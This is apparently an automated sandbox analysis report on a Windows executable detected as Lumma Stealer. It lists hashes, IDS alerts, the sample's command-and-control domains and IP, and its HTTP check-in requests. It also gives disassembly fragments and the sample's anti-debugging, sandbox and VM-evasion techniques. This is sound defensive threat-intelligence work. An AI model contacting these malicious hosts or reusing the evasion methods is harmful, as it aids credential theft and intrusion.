
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562276
MD5: 1959840f03733001022c3aa78866b3e0
SHA1: a6a9800d7009ef076f66deecd050261271d6e3c0
SHA256: e38e917a486da4cd7fd65caf9761101feedc4a4d0feb047ad1b14e3423f3e903
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1959840F03733001022C3AA78866B3E0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-11-25T12:58:19.750219+0100  2028371  3         Unknown Traffic                192.168.2.7  49706        104.21.88.250   443               TCP
2024-11-25T12:58:21.491196+0100  2028371  3         Unknown Traffic                192.168.2.7  49707        104.21.88.250   443               TCP
2024-11-25T12:58:20.536502+0100  2054653  1         A Network Trojan was detected  192.168.2.7  49706        104.21.88.250   443               TCP
2024-11-25T12:58:20.536502+0100  2049836  1         A Network Trojan was detected  192.168.2.7  49706        104.21.88.250   443               TCP

AV Detection

Source: file.exe | Avira: detected
Source: https://frogs-severz.sbs/W | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/api(wWdtP | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs// | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/api(wl | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apiC | Avira URL Cloud: Label: malware
Source: https://frogs-severz.sbs/apiR | Avira URL Cloud: Label: malware
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [eax], bl | 3_2_0098CF05
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h] | 3_2_0098E0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 3_2_009BF8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edi, eax | 3_2_009BF8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h] | 3_2_009898F0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, eax | 3_2_009BB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 3_2_009BB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ecx, eax | 3_2_0098C02B
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 3_2_009BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh | 3_2_009BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h | 3_2_009BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 3_2_009BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [ebx], al | 3_2_009A0870
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 3_2_009BB860
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+14h] | 3_2_0098E970
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [esi], cx | 3_2_0098EA38
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h] | 3_2_0098E35B
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 3_2_0098BC9D
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 3_2_00985C90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 3_2_00985C90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_009A8CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h | 3_2_009BBCE0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 3_2_0098AD00
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [edi] | 3_2_009A5E90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h] | 3_2_009877D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax | 3_2_009877D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch] | 3_2_009C0F60

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49706 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49706 -> 104.21.88.250:443
Source: Joe Sandbox View | IP Address: 104.21.88.250
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49707 -> 104.21.88.250:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49706 -> 104.21.88.250:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: frogs-severz.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic | DNS traffic detected: DNS query: frogs-severz.sbs
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: frogs-severz.sbs
Source: file.exe, 00000003.00000003.1331160862.0000000001524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1330974839.0000000001517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frogs-severz.sbs/
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frogs-severz.sbs//
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frogs-severz.sbs/W
Source: file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frogs-severz.sbs/api
Source: file.exe, 00000003.00000003.1330974839.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frogs-severz.sbs/api(wWdtP
Source: file.exe, 00000003.00000003.1330974839.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frogs-severz.sbs/api(wl
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frogs-severz.sbs/apiC
Source: file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frogs-severz.sbs/apiR
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | HTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.7:49706 version: TLS 1.2

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009B9030 | 3_2_009B9030
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009889A0 | 3_2_009889A0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0098CF05 | 3_2_0098CF05
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE | 3_2_00B588BE
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0098E0D8 | 3_2_0098E0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009BF8D0 | 3_2_009BF8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009898F0 | 3_2_009898F0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009BB8E0 | 3_2_009BB8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00984040 | 3_2_00984040
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00986840 | 3_2_00986840
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009BC040 | 3_2_009BC040
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009A0870 | 3_2_009A0870
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009861A0 | 3_2_009861A0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009B41D0 | 3_2_009B41D0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0098E970 | 3_2_0098E970
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00C20128 | 3_2_00C20128
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00985AC9 | 3_2_00985AC9
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00984AC0 | 3_2_00984AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00A642D2 | 3_2_00A642D2
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00989210 | 3_2_00989210
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0098B210 | 3_2_0098B210
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00982B80 | 3_2_00982B80
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0099DB30 | 3_2_0099DB30
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0099FB60 | 3_2_0099FB60
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00985C90 | 3_2_00985C90
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009C0C80 | 3_2_009C0C80
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009A8CB0 | 3_2_009A8CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009894D0 | 3_2_009894D0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00986CC0 | 3_2_00986CC0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009B24E0 | 3_2_009B24E0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B50406 | 3_2_00B50406
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0098542C | 3_2_0098542C
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00983580 | 3_2_00983580
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009C1580 | 3_2_009C1580
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B5758B | 3_2_00B5758B
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0098AD00 | 3_2_0098AD00
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00999530 | 3_2_00999530
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009A3D70 | 3_2_009A3D70
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009A5E90 | 3_2_009A5E90
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00AF8E9C | 3_2_00AF8E9C
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009A7E20 | 3_2_009A7E20
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009A0650 | 3_2_009A0650
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009A1790 | 3_2_009A1790
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009BC780 | 3_2_009BC780
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009B87B0 | 3_2_009B87B0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009877D0 | 3_2_009877D0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009827D0 | 3_2_009827D0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B51F3C | 3_2_00B51F3C
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009A8770 | 3_2_009A8770
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009C0F60 | 3_2_009C0F60
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9992123463114754
Source: file.exe | Static PE information: Section: izyzjrki ZLIB complexity 0.9938021708817237
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.evad.winEXE@1/0@2/1
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009B27B0 CoCreateInstance, | 3_2_009B27B0
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: file.exe | Static file information: File size 1846784 > 1048576
Source: file.exe | Static PE information: Raw size of izyzjrki is bigger than: 0x100000 < 0x199000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 3.2.file.exe.980000.0.unpack | :EW;.rsrc:W;.idata :W; :EW;izyzjrki:EW;beoowxtj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;izyzjrki:EW;beoowxtj:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c8d28 should be: 0x1d1d0c
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: izyzjrki
Source: file.exe | Static PE information: section name: beoowxtj
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00C088CA push 272CCDBFh; mov dword ptr [esp], edi | 3_2_00C0895F
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push 407811EAh; mov dword ptr [esp], edi | 3_2_00B588C9
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push 16B5767Fh; mov dword ptr [esp], edx | 3_2_00B5890B
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ecx; mov dword ptr [esp], edx | 3_2_00B5893B
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push eax; mov dword ptr [esp], ebx | 3_2_00B5893F
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push edx; mov dword ptr [esp], ebp | 3_2_00B58985
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ecx; mov dword ptr [esp], 6E69595Bh | 3_2_00B589C7
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ecx; mov dword ptr [esp], eax | 3_2_00B589F0
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ebp; mov dword ptr [esp], edx | 3_2_00B58A97
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push edi; mov dword ptr [esp], ebp | 3_2_00B58B3F
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push edi; mov dword ptr [esp], 0664B9FBh | 3_2_00B58BC3
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push esi; mov dword ptr [esp], edx | 3_2_00B58BEF
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push edi; mov dword ptr [esp], 4BBDE7D3h | 3_2_00B58C55
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push esi; mov dword ptr [esp], edx | 3_2_00B58CE2
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push esi; mov dword ptr [esp], edi | 3_2_00B58CED
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push esi; mov dword ptr [esp], edi | 3_2_00B58DE9
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ecx; mov dword ptr [esp], eax | 3_2_00B58E5F
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push 12F80726h; mov dword ptr [esp], eax | 3_2_00B58E7C
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push 65C3643Ah; mov dword ptr [esp], ebx | 3_2_00B58F6E
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push eax; mov dword ptr [esp], edi | 3_2_00B58FDC
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push edi; mov dword ptr [esp], ecx | 3_2_00B59005
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push 6DB7928Ch; mov dword ptr [esp], eax | 3_2_00B590B7
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ebx; mov dword ptr [esp], 0C8F5CFFh | 3_2_00B590C8
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push 4C961543h; mov dword ptr [esp], eax | 3_2_00B590E1
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push edx; mov dword ptr [esp], ebx | 3_2_00B5916B
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ebp; mov dword ptr [esp], ebx | 3_2_00B5917A
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push 4EE5EC02h; mov dword ptr [esp], eax | 3_2_00B5926C
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push 1772D8F1h; mov dword ptr [esp], ecx | 3_2_00B59297
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ebx; mov dword ptr [esp], esi | 3_2_00B59389
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push esi; mov dword ptr [esp], edi | 3_2_00B593A1
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00B588BE push ebp; mov dword ptr [esp], edi | 3_2_00B593D0
Source: file.exe | Static PE information: section name: entropy: 7.97874522345175
Source: file.exe | Static PE information: section name: izyzjrki entropy: 7.952961646719837

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DCFA6 second address: 9DCFAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5349E second address: B534A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B534A2 second address: B534A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5ED18 second address: B5ED1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5EFEA second address: B5EFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5F16D second address: B5F179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F35AD0C7238h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5F179 second address: B5F180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5F180 second address: B5F1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jo 00007F35AD0C723Ch 0x00000012 jns 00007F35AD0C7236h 0x00000018 jmp 00007F35AD0C7249h 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5F318 second address: B5F31E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5F31E second address: B5F322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5F322 second address: B5F328 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5F328 second address: B5F343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7245h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5F343 second address: B5F347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B60FC8 second address: B60FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B610A5 second address: B610A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B610A9 second address: B610BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jl 00007F35AD0C7240h 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
